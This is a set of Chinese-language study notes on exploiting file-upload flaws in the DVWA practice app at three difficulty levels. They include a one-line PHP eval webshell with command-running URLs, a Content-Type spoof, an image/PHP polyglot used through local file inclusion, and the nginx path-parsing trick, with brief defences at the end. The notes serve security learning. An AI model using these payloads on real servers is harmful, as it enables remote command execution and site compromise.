檔案上傳-筆記

標籤：src   upload   get   nginx   val   成功   常見   test   目錄   

 網站常見功能，例如：上傳頭像 LOW上傳成功phpinfo.php可訪問執行 http://192.168.3.88/dvwa/hackable/uploads/phpinfo.php 漏洞利用：以PHP為例，可上傳一句話webshellcmd.php<?php@eval($_GET[‘cmd‘]);?> 可用來執行各種php函數、命令。例如：http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=phpinfo();http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=system(dir);http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=system(‘type c:\\phpstudy\\www\\dvwa\\php.ini‘);  medium.上傳非圖片檔案時通過改包修改發送的post請求包中的 Content-Type:  image/jpeg 即可  high我們嘗試後探索服務器會對我們上傳的檔案的檔案尾碼、檔案類型、檔案內容進行驗證。使用dos命令製作內含圖，把我們想要執行的檔案與正常的圖片合并。copy test.jpg/b+ phpinfo.txt/a phpinfo.jpg 利用本地檔案包含漏洞進行調用執行http://192.168.3.88/dvwa/vulnerabilities/fi/?page=file:///C:\phpStudy\WWW\DVWA\hackable\uploads\cmd.jpg 利用 Nginx解析漏洞 使用phpstudy類比測試環境 查看php-ini設定檔中 cgi.fix_pathinfo=1 是否為1 如是則存在畸形解析xxx.xxx/xxx.php  前一個檔案存在的話會當成是php檔案進行解析 防護：對使用者上傳的圖片壓縮重建、檔案重新命名、儲存目錄使用權限設定、儲存目錄與網站分離  

檔案上傳-筆記